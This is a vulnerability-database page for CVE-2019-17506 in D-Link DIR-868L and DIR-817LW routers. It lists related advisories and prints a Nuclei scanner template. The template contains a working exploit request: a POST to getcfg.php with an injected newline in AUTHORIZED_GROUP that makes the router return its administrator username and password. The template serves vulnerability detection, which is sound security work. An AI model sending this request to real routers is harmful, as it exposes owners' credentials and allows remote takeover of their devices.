| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| The vulnerability of the web interfaces of D-Link DIR-868L B1 and D-Link DIR-817LW A1 wireless routers allows a intruder to gain unauthorized access to protected information. | 13 Dec 201900:00 | – | bdu_fstec | |
| CVE-2019-17506 | 12 Dec 202213:30 | – | circl | |
| D-Link DIR-817LW and D-Link DIR-868L License Issue Vulnerability | 23 Oct 201900:00 | – | cnvd | |
| CVE-2019-17506 | 11 Oct 201919:29 | – | cve | |
| CVE-2019-17506 | 11 Oct 201919:29 | – | cvelist | |
| CVE-2019-17506 | 11 Oct 201920:15 | – | nvd | |
| D-Link DIR Devices Information Disclosure Vulnerability (Oct 2019) | 24 Oct 201900:00 | – | openvas | |
| CVE-2019-17506 | 11 Oct 201920:15 | – | osv | |
| Authentication flaw | 11 Oct 201920:15 | – | prion | |
| PT-2019-4070 · D Link · D-Link Dir-868L +1 | 11 Oct 201900:00 | – | ptsecurity |
id: CVE-2019-17506
info:
name: D-Link DIR-868L/817LW - Information Disclosure
author: pikpikcu
severity: critical
description: |
D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.
impact: |
An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and credentials.
remediation: |
Apply the latest firmware update provided by D-Link to fix the information disclosure vulnerability.
reference:
- https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py
- https://nvd.nist.gov/vuln/detail/CVE-2019-17506
- https://github.com/openx-org/BLEN
- https://github.com/sobinge/nuclei-templates
- https://github.com/SexyBeast233/SecBooks
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-17506
cwe-id: CWE-306
epss-score: 0.57298
epss-percentile: 0.98955
cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dlink
product: dir-868l_b1_firmware
tags: cve,cve2019,dlink,router,disclosure,vkev,vuln
http:
- method: POST
path:
- "{{BaseURL}}/getcfg.php"
body: |
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers:
Content-Type: text/xml
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</password>"
- "DEVICE.ACCOUNT"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100d4cde01fb1ea15f7a7700e93c517ae07ab2523fc7d91c3817196413c2a8c51a0022041029c213156bcaf0b4226f7508a3488d49af03de7705dbe5d52447da2b415b0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation